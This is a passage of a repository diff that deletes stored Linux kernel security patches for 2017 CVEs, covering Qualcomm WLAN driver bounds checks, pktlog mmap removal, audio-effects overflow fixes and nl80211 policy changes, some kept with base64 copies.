-+	if (!tb[QCA_WLAN_VENDOR_ATTR_PNO_CONFIG_REQUEST_ID]) {
- 		hddLog(LOGE, FL("attr request id failed"));
- 		goto fail;
- 	}
- 	req_msg->request_id = nla_get_u32(
--	    tb[QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_REQUEST_ID]);
-+	    tb[QCA_WLAN_VENDOR_ATTR_PNO_CONFIG_REQUEST_ID]);
- 
- 	req_msg->session_id = adapter->sessionId;
- 	hddLog(LOG1, FL("Req Id %u Session Id %d"),
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11067/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11067/ANY/0001.patch
deleted file mode 100644
index c5527abc..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11067/ANY/0001.patch
+++ /dev/null
@@ -1,139 +0,0 @@
-From 3fabdcba3a09ce8f3cc757bf6240e53421a1e363 Mon Sep 17 00:00:00 2001
-From: Srinivas Girigowda <sgirigow@codeaurora.org>
-Date: Fri, 4 Aug 2017 15:51:34 -0700
-Subject: [PATCH] qcacld-2.0: Check target address boundary before access
-
-Athdiag procfs entry does not have address sanity check, this is
-resulting in invalid ioread32/iowrite32 if out of PCIE BAR address
-is used.
-
-Fix this by allowing address with in PCIE BAR range.
-
-Change-Id: I8365eacca7ccc4f489b7d0bda6c998384d0fec7b
-CRs-Fixed: 2062012
-Bug: 62058746
-Signed-off-by: Srinivas Girigowda <sgirigow@codeaurora.org>
----
- .../staging/qcacld-2.0/CORE/SERVICES/COMMON/hif.h  |  8 +++++++
- .../qcacld-2.0/CORE/SERVICES/HIF/PCIe/hif_pci.c    | 26 ++++++++++++++++++++++
- .../qcacld-2.0/CORE/SERVICES/HIF/PCIe/if_pci.c     |  1 +
- .../qcacld-2.0/CORE/SERVICES/HIF/PCIe/if_pci.h     |  2 +-
- .../qcacld-2.0/CORE/SERVICES/HIF/ath_procfs.c      |  9 ++++++--
- 5 files changed, 43 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/SERVICES/COMMON/hif.h b/drivers/staging/qcacld-2.0/CORE/SERVICES/COMMON/hif.h
-index a3c31afe3bd67..06a02eebc1be5 100644
---- a/drivers/staging/qcacld-2.0/CORE/SERVICES/COMMON/hif.h
-+++ b/drivers/staging/qcacld-2.0/CORE/SERVICES/COMMON/hif.h
-@@ -880,4 +880,12 @@ static inline void hif_request_runtime_pm_resume(void *ol_sc)
- 
- A_BOOL HIFIsMailBoxSwapped(HIF_DEVICE *hd);
- 
-+#ifdef HIF_PCI
-+int hif_addr_in_boundary(HIF_DEVICE *hif_device, A_UINT32 offset);
-+#else
-+static inline int hif_addr_in_boundary(HIF_DEVICE *hif_device, A_UINT32 offset)
-+{
-+	return 0;
-+}
-+#endif
- #endif /* _HIF_H_ */
-diff --git a/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/PCIe/hif_pci.c b/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/PCIe/hif_pci.c
-index 3a1de9d23d07a..ba33ac976305a 100644
---- a/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/PCIe/hif_pci.c
-+++ b/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/PCIe/hif_pci.c
-@@ -3628,3 +3628,29 @@ bool hif_is_80211_fw_wow_required(void)
- {
- 	return false;
- }
-+
-+/* hif_addr_in_boundary() - API to check if addr is with in PCIE BAR range
-+ * @hif_device:  context of cd
-+ * @offset: offset from PCI BAR mapped base address.
-+ *
-+ * API determines if address to be accessed is with in range or out
-+ * of bound.
-+ *
-+ * Return: success if address is with in PCI BAR range.
-+ */
-+int hif_addr_in_boundary(HIF_DEVICE *hif_device, A_UINT32 offset)
-+{
-+	struct HIF_CE_state *hif_state;
-+	struct hif_pci_softc *sc;
-+
-+	hif_state = (struct HIF_CE_state *)hif_device;
-+	sc = hif_state->sc;
-+	if (unlikely(offset + sizeof(unsigned int) > sc->mem_len)) {
-+		VOS_TRACE(VOS_MODULE_ID_HIF, VOS_TRACE_LEVEL_ERROR,
-+			"refusing to read mmio out of bounds at 0x%08x - 0x%08zx (max 0x%08zx)\n",
-+			offset, offset + sizeof(unsigned int), sc->mem_len);
-+		return -EINVAL;
-+	}
-+
-+	return 0;
-+}
-diff --git a/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/PCIe/if_pci.c b/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/PCIe/if_pci.c
-index 17792cd6460e4..0d5fd226f5275 100644
---- a/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/PCIe/if_pci.c
-+++ b/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/PCIe/if_pci.c
-@@ -1589,6 +1589,7 @@ hif_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id)
- 
-     OS_MEMZERO(sc, sizeof(*sc));
-     sc->mem = mem;
-+    sc->mem_len = pci_resource_len(pdev, BAR_NUM);
-     sc->pdev = pdev;
-     sc->dev = &pdev->dev;
- 
-diff --git a/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/PCIe/if_pci.h b/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/PCIe/if_pci.h
-index 3204f6101eb9d..ea0e22d3d1a80 100644
---- a/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/PCIe/if_pci.h
-+++ b/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/PCIe/if_pci.h
-@@ -82,7 +82,7 @@ struct hif_pci_pm_stats {
- struct hif_pci_softc {
-     void __iomem *mem; /* PCI address. */
-                        /* For efficiency, should be first in struct */
--
-+    size_t mem_len;
-     struct device *dev;
-     struct pci_dev *pdev;
-     struct _NIC_DEV aps_osdev;
-diff --git a/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/ath_procfs.c b/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/ath_procfs.c
-index ed0cfd69d7228..d1a34dd6c3966 100644
---- a/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/ath_procfs.c
-+++ b/drivers/staging/qcacld-2.0/CORE/SERVICES/HIF/ath_procfs.c
-@@ -90,13 +90,16 @@ static ssize_t ath_procfs_diag_read(struct file *file, char __user *buf,
- 	int rv;
- 	A_UINT8 *read_buffer = NULL;
- 
-+	hif_hdl = get_hif_hdl_from_file(file);
-+	if (hif_addr_in_boundary(hif_hdl, (A_UINT32)(*pos)))
-+		return -EINVAL;
-+
- 	read_buffer = (A_UINT8 *)vos_mem_malloc(count);
- 	if (NULL == read_buffer) {
- 		pr_debug("%s: vos_mem_alloc failed\n", __func__);
- 		return -EINVAL;
- 	}
- 
--	hif_hdl = get_hif_hdl_from_file(file);
- 	pr_debug("rd buff 0x%p cnt %zu offset 0x%x buf 0x%p\n",
- 			read_buffer,count,
- 			(int)*pos, buf);
-@@ -129,6 +132,9 @@ static ssize_t ath_procfs_diag_write(struct file *file, const char __user *buf,
- 	int rv;
- 	A_UINT8 *write_buffer = NULL;
- 
-+	hif_hdl = get_hif_hdl_from_file(file);
-+	if (hif_addr_in_boundary(hif_hdl, (A_UINT32)(*pos)))
-+		return -EINVAL;
- 	write_buffer = (A_UINT8 *)vos_mem_malloc(count);
- 	if (NULL == write_buffer) {
- 		pr_debug("%s: vos_mem_alloc failed\n", __func__);
-@@ -139,7 +145,6 @@ static ssize_t ath_procfs_diag_write(struct file *file, const char __user *buf,
- 		return -EFAULT;
- 	}
- 
--	hif_hdl = get_hif_hdl_from_file(file);
- 	pr_debug("wr buff 0x%p buf 0x%p cnt %zu offset 0x%x value 0x%x\n",
- 			write_buffer, buf, count,
- 			(int)*pos, *((A_UINT32 *)write_buffer));
diff --git a/Patches/Linux_CVEs/CVE-2017-11073/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-11073/3.10/0001.patch
deleted file mode 100644
index 685a041e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11073/3.10/0001.patch
+++ /dev/null
@@ -1,143 +0,0 @@
-From 120d28bad9890eca3a6451a83a7c71cb650dfef7 Mon Sep 17 00:00:00 2001
-From: "Poddar, Siddarth" <siddpodd@codeaurora.org>
-Date: Wed, 5 Jul 2017 12:31:03 +0530
-Subject: [PATCH] qcacld-2.0: Remove code related to mmap functionality for
- pktlog
-
-Remove the code related to mmap functionality for pktlog
-as it is no longer used/required.
-
-Bug: 62084791
-Change-Id: I06767f108c0ff6462a9e20e7b50d08bf4ac9555f
-CRs-Fixed: 2064767
-Signed-off-by: Ahmed ElArabawy <arabawy@google.com>
----
- .../qcacld-2.0/CORE/UTILS/PKTLOG/linux_ac.c        | 102 ---------------------
- 1 file changed, 102 deletions(-)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/UTILS/PKTLOG/linux_ac.c b/drivers/staging/qcacld-2.0/CORE/UTILS/PKTLOG/linux_ac.c
-index 173ed4e8eec1a..ec61b77e827cf 100644
---- a/drivers/staging/qcacld-2.0/CORE/UTILS/PKTLOG/linux_ac.c
-+++ b/drivers/staging/qcacld-2.0/CORE/UTILS/PKTLOG/linux_ac.c
-@@ -82,14 +82,12 @@ static int pktlog_attach(struct ol_softc *sc);
- static void pktlog_detach(struct ol_softc *sc);
- static int pktlog_open(struct inode *i, struct file *f);
- static int pktlog_release(struct inode *i, struct file *f);
--static int pktlog_mmap(struct file *f, struct vm_area_struct *vma);
- static ssize_t pktlog_read(struct file *file, char *buf, size_t nbytes,
- 			   loff_t * ppos);
- 
- static struct file_operations pktlog_fops = {
- 	open:pktlog_open,
- 	release:pktlog_release,
--	mmap:pktlog_mmap,
- 	read:pktlog_read,
- };
- 
-@@ -921,106 +919,6 @@ static volatile void *pktlog_virt_to_logical(volatile void *addr)
- }
- #endif
- 
--/* vma operations for mapping vmalloced area to user space */
--static void pktlog_vopen(struct vm_area_struct *vma)
--{
--	PKTLOG_MOD_INC_USE_COUNT;
--}
--
--static void pktlog_vclose(struct vm_area_struct *vma)
--{
--	PKTLOG_MOD_DEC_USE_COUNT;
--}
--
--#if LINUX_VERSION_CODE > KERNEL_VERSION(2,6,25)
--int pktlog_fault(struct vm_area_struct *vma, struct vm_fault *vmf)
--{
--	unsigned long address = (unsigned long)vmf->virtual_address;
--
--	if (address == 0UL)
--		return VM_FAULT_NOPAGE;
--
--	if (vmf->pgoff > vma->vm_end)
--		return VM_FAULT_SIGBUS;
--
--	get_page(virt_to_page((void *)address));
--	vmf->page = virt_to_page((void *)address);
--	return VM_FAULT_MINOR;
--}
--#else
--#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,0)
--struct page *pktlog_vmmap(struct vm_area_struct *vma, unsigned long addr,
--			  int *type)
--#else
--struct page *pktlog_vmmap(struct vm_area_struct *vma, unsigned long addr,
--			  int write_access)
--#endif
--{
--	unsigned long offset, vaddr;
--	struct proc_dir_entry *proc_entry;
--	struct ath_pktlog_info *pl_info =
--
--	proc_entry = PDE(vma->vm_file->f_dentry->d_inode);
--	pl_info = (struct ath_pktlog_info *)proc_entry->data;
--
--	offset = addr - vma->vm_start + (vma->vm_pgoff << PAGE_SHIFT);
--	vaddr = (unsigned long) pktlog_virt_to_logical(
--					(void *)(pl_info->buf) + offset);
--
--	if (vaddr == 0UL) {
--		printk(PKTLOG_TAG "%s: page fault out of range\n", __func__);
--		return ((struct page *) 0UL);
--	}
--
--	/* increment the usage count of the page */
--	get_page(virt_to_page((void*)vaddr));
--
--#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,0)
--	if (type)
--		*type = VM_FAULT_MINOR;
--#endif
--
--	return virt_to_page((void *)vaddr);
--}
--#endif /* LINUX_VERSION_CODE > KERNEL_VERSION(2,6,25) */
--
--static struct vm_operations_struct pktlog_vmops = {
--	open:pktlog_vopen,
--	close:pktlog_vclose,
--#if LINUX_VERSION_CODE > KERNEL_VERSION(2,6,25)
--	fault:pktlog_fault,
--#else
--	nopage:pktlog_vmmap,
--#endif
--};
--
--static int pktlog_mmap(struct file *file, struct vm_area_struct *vma)
--{
--#if LINUX_VERSION_CODE >= KERNEL_VERSION(3,10,0)
--	struct ath_pktlog_info *pl_info = (struct ath_pktlog_info *)
--					  PDE_DATA(file->f_path.dentry->d_inode);
--#else
--	struct proc_dir_entry *proc_entry = PDE(file->f_dentry->d_inode);
--	struct ath_pktlog_info *pl_info = (struct ath_pktlog_info *)
--					  proc_entry->data;
--#endif
--
--	if (vma->vm_pgoff != 0) {
--		/* Entire buffer should be mapped */
--		return -EINVAL;
--	}
--
--	if (!pl_info->buf) {
--		printk(PKTLOG_TAG "%s: Log buffer unavailable\n", __func__);
--		return -ENOMEM;
--	}
--
--	vma->vm_flags |= VM_LOCKED;
--	vma->vm_ops = &pktlog_vmops;
--	pktlog_vopen(vma);
--	return 0;
--}
--
- int pktlogmod_init(void *context)
- {
- 	int ret;
diff --git a/Patches/Linux_CVEs/CVE-2017-11085/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-11085/3.10/0001.patch
deleted file mode 100644
index a55a439d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11085/3.10/0001.patch
+++ /dev/null
@@ -1,274 +0,0 @@
-From dc8f7a19762df2c84678482b60f6b807b919eb44 Mon Sep 17 00:00:00 2001
-From: Weiyin Jiang <wjiang@codeaurora.org>
-Date: Fri, 28 Jul 2017 11:01:40 +0800
-Subject: [PATCH] SoC: msm: audio-effects: return directly to avoid integer
- overflow
-
-Return error code directly to avoid further integer overflow leading
-to buffer overflow.
-
-Bug: 62952032
-Change-Id: I8b74efda227726494724f4387c45b5b6fa04637b
-CRs-Fixed: 2077909
-Signed-off-by: Weiyin Jiang <wjiang@codeaurora.org>
-Signed-off-by: Paresh Purabhiya <ppurab@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c | 56 ++++++++++++-------------
- 1 file changed, 28 insertions(+), 28 deletions(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c
-index 2bcd339f1ff59..95c382ddb77b9 100644
---- a/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c
-@@ -175,7 +175,7 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- 						MAX_INBAND_PARAM_SZ,
- 						"VIRT ENABLE", rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				*updt_params++ =
- 				AUDPROC_MODULE_ID_VIRTUALIZER;
- 				*updt_params++ =
-@@ -203,7 +203,7 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- 						MAX_INBAND_PARAM_SZ,
- 						"VIRT STRENGTH", rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_VIRTUALIZER;
- 				*updt_params++ =
-@@ -231,7 +231,7 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- 						MAX_INBAND_PARAM_SZ,
- 						"VIRT OUT_TYPE", rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_VIRTUALIZER;
- 				*updt_params++ =
-@@ -259,7 +259,7 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- 						MAX_INBAND_PARAM_SZ,
- 						"VIRT GAIN_ADJUST", rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				*updt_params++ =
- 				AUDPROC_MODULE_ID_VIRTUALIZER;
- 				*updt_params++ =
-@@ -338,7 +338,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 						MAX_INBAND_PARAM_SZ,
- 						"REVERB_ENABLE", rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
-@@ -366,7 +366,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 						MAX_INBAND_PARAM_SZ,
- 						"REVERB_MODE", rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
-@@ -394,7 +394,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 						MAX_INBAND_PARAM_SZ,
- 						"REVERB_PRESET", rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
-@@ -422,7 +422,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 						MAX_INBAND_PARAM_SZ,
- 						"REVERB_WET_MIX", rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
-@@ -450,7 +450,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 						MAX_INBAND_PARAM_SZ,
- 						"REVERB_GAIN_ADJUST", rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
-@@ -478,7 +478,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 						MAX_INBAND_PARAM_SZ,
- 						"REVERB_ROOM_LEVEL", rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
-@@ -506,7 +506,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 						MAX_INBAND_PARAM_SZ,
- 						"REVERB_ROOM_HF_LEVEL", rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
-@@ -534,7 +534,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 						MAX_INBAND_PARAM_SZ,
- 						"REVERB_DECAY_TIME", rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
-@@ -562,7 +562,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 						MAX_INBAND_PARAM_SZ,
- 						"REVERB_DECAY_HF_RATIO", rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
-@@ -590,7 +590,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 						MAX_INBAND_PARAM_SZ,
- 						"REVERB_REFLECTIONS_LEVEL", rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				*updt_params++ =
- 				AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
-@@ -618,7 +618,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 						MAX_INBAND_PARAM_SZ,
- 						"REVERB_REFLECTIONS_DELAY", rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				*updt_params++ =
- 				AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
-@@ -646,7 +646,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 						MAX_INBAND_PARAM_SZ,
- 						"REVERB_LEVEL", rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
-@@ -674,7 +674,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 						MAX_INBAND_PARAM_SZ,
- 						"REVERB_DELAY", rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
-@@ -702,7 +702,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 						MAX_INBAND_PARAM_SZ,
- 						"REVERB_DIFFUSION", rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
-@@ -730,7 +730,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 						MAX_INBAND_PARAM_SZ,
- 						"REVERB_DENSITY", rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
-@@ -810,7 +810,7 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- 						MAX_INBAND_PARAM_SZ,
- 						"BASS_BOOST_ENABLE", rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_BASS_BOOST;
- 				*updt_params++ =
-@@ -838,7 +838,7 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- 						MAX_INBAND_PARAM_SZ,
- 						"BASS_BOOST_MODE", rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_BASS_BOOST;
- 				*updt_params++ =
-@@ -866,7 +866,7 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- 						MAX_INBAND_PARAM_SZ,
- 						"BASS_BOOST_STRENGTH", rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_BASS_BOOST;
- 				*updt_params++ =
-@@ -947,7 +947,7 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 						MAX_INBAND_PARAM_SZ,
- 						"EQ_ENABLE", rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_POPLESS_EQUALIZER;
- 				*updt_params++ =
-@@ -1015,7 +1015,7 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 						MAX_INBAND_PARAM_SZ,
- 						"EQ_CONFIG", rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_POPLESS_EQUALIZER;
- 				*updt_params++ =
-@@ -1066,7 +1066,7 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 						MAX_INBAND_PARAM_SZ,
- 						"EQ_BAND_INDEX", rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_POPLESS_EQUALIZER;
- 				*updt_params++ =
-@@ -1098,7 +1098,7 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 						MAX_INBAND_PARAM_SZ,
- 						"EQ_SINGLE_BAND_FREQ", rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_POPLESS_EQUALIZER;
- 				*updt_params++ =
-@@ -1188,7 +1188,7 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac,
- 						"VOLUME/VOLUME2_GAIN_2CH",
- 						rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				if (instance == SOFT_VOLUME_INSTANCE_2)
- 					*updt_params++ =
- 						ASM_MODULE_ID_VOL_CTRL2;
-@@ -1237,7 +1237,7 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac,
- 						"VOLUME/VOLUME2_GAIN_MASTER",
- 						rc);
- 				if (rc != 0)
--					break;
-+					goto invalid_config;
- 				if (instance == SOFT_VOLUME_INSTANCE_2)
- 					*updt_params++ =
- 						ASM_MODULE_ID_VOL_CTRL2;
diff --git a/Patches/Linux_CVEs/CVE-2017-11089/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11089/ANY/0001.patch
deleted file mode 100644
index 7dca8216..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11089/ANY/0001.patch
+++ /dev/null
@@ -1,12 +0,0 @@
-diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
-index 78b6f74..f927434 100644
---- a/net/wireless/nl80211.c
-+++ b/net/wireless/nl80211.c
-@@ -365,6 +365,7 @@
- 	[NL80211_ATTR_SCAN_FLAGS] = { .type = NLA_U32 },
- 	[NL80211_ATTR_P2P_CTWINDOW] = { .type = NLA_U8 },
- 	[NL80211_ATTR_P2P_OPPPS] = { .type = NLA_U8 },
-+	[NL80211_ATTR_LOCAL_MESH_POWER_MODE] = {. type = NLA_U32 },
- 	[NL80211_ATTR_ACL_POLICY] = {. type = NLA_U32 },
- 	[NL80211_ATTR_MAC_ADDRS] = { .type = NLA_NESTED },
- 	[NL80211_ATTR_STA_CAPABILITY] = { .type = NLA_U16 },
diff --git a/Patches/Linux_CVEs/CVE-2017-11089/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-11089/ANY/0001.patch.base64
deleted file mode 100644
index f8a6d711..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11089/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL25ldC93aXJlbGVzcy9ubDgwMjExLmMgYi9uZXQvd2lyZWxlc3Mvbmw4MDIxMS5jCmluZGV4IDc4YjZmNzQuLmY5Mjc0MzQgMTAwNjQ0Ci0tLSBhL25ldC93aXJlbGVzcy9ubDgwMjExLmMKKysrIGIvbmV0L3dpcmVsZXNzL25sODAyMTEuYwpAQCAtMzY1LDYgKzM2NSw3IEBACiAJW05MODAyMTFfQVRUUl9TQ0FOX0ZMQUdTXSA9IHsgLnR5cGUgPSBOTEFfVTMyIH0sCiAJW05MODAyMTFfQVRUUl9QMlBfQ1RXSU5ET1ddID0geyAudHlwZSA9IE5MQV9VOCB9LAogCVtOTDgwMjExX0FUVFJfUDJQX09QUFBTXSA9IHsgLnR5cGUgPSBOTEFfVTggfSwKKwlbTkw4MDIxMV9BVFRSX0xPQ0FMX01FU0hfUE9XRVJfTU9ERV0gPSB7LiB0eXBlID0gTkxBX1UzMiB9LAogCVtOTDgwMjExX0FUVFJfQUNMX1BPTElDWV0gPSB7LiB0eXBlID0gTkxBX1UzMiB9LAogCVtOTDgwMjExX0FUVFJfTUFDX0FERFJTXSA9IHsgLnR5cGUgPSBOTEFfTkVTVEVEIH0sCiAJW05MODAyMTFfQVRUUl9TVEFfQ0FQQUJJTElUWV0gPSB7IC50eXBlID0gTkxBX1UxNiB9LAo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-11090/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11090/ANY/0001.patch
deleted file mode 100644
index e3116765..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11090/ANY/0001.patch
+++ /dev/null
@@ -1,14 +0,0 @@
-diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
-index 5112673..78b6f74 100644
---- a/net/wireless/nl80211.c
-+++ b/net/wireless/nl80211.c
-@@ -310,8 +310,7 @@
- 	[NL80211_ATTR_WPA_VERSIONS] = { .type = NLA_U32 },
- 	[NL80211_ATTR_PID] = { .type = NLA_U32 },
- 	[NL80211_ATTR_4ADDR] = { .type = NLA_U8 },
--	[NL80211_ATTR_PMKID] = { .type = NLA_BINARY,
--				 .len = WLAN_PMKID_LEN },
-+	[NL80211_ATTR_PMKID] = { .len = WLAN_PMKID_LEN },
- 	[NL80211_ATTR_DURATION] = { .type = NLA_U32 },
- 	[NL80211_ATTR_COOKIE] = { .type = NLA_U64 },
- 	[NL80211_ATTR_TX_RATES] = { .type = NLA_NESTED },
diff --git a/Patches/Linux_CVEs/CVE-2017-11090/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-11090/ANY/0001.patch.base64
deleted file mode 100644
index b1a4f493..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11090/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL25ldC93aXJlbGVzcy9ubDgwMjExLmMgYi9uZXQvd2lyZWxlc3Mvbmw4MDIxMS5jCmluZGV4IDUxMTI2NzMuLjc4YjZmNzQgMTAwNjQ0Ci0tLSBhL25ldC93aXJlbGVzcy9ubDgwMjExLmMKKysrIGIvbmV0L3dpcmVsZXNzL25sODAyMTEuYwpAQCAtMzEwLDggKzMxMCw3IEBACiAJW05MODAyMTFfQVRUUl9XUEFfVkVSU0lPTlNdID0geyAudHlwZSA9IE5MQV9VMzIgfSwKIAlbTkw4MDIxMV9BVFRSX1BJRF0gPSB7IC50eXBlID0gTkxBX1UzMiB9LAogCVtOTDgwMjExX0FUVFJfNEFERFJdID0geyAudHlwZSA9IE5MQV9VOCB9LAotCVtOTDgwMjExX0FUVFJfUE1LSURdID0geyAudHlwZSA9IE5MQV9CSU5BUlksCi0JCQkJIC5sZW4gPSBXTEFOX1BNS0lEX0xFTiB9LAorCVtOTDgwMjExX0FUVFJfUE1LSURdID0geyAubGVuID0gV0xBTl9QTUtJRF9MRU4gfSwKIAlbTkw4MDIxMV9BVFRSX0RVUkFUSU9OXSA9IHsgLnR5cGUgPSBOTEFfVTMyIH0sCiAJW05MODAyMTFfQVRUUl9DT09LSUVdID0geyAudHlwZSA9IE5MQV9VNjQgfSwKIAlbTkw4MDIxMV9BVFRSX1RYX1JBVEVTXSA9IHsgLnR5cGUgPSBOTEFfTkVTVEVEIH0sCg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-11091/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-11091/3.18/0001.patch
deleted file mode 100644
index cdd5771c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11091/3.18/0001.patch
+++ /dev/null
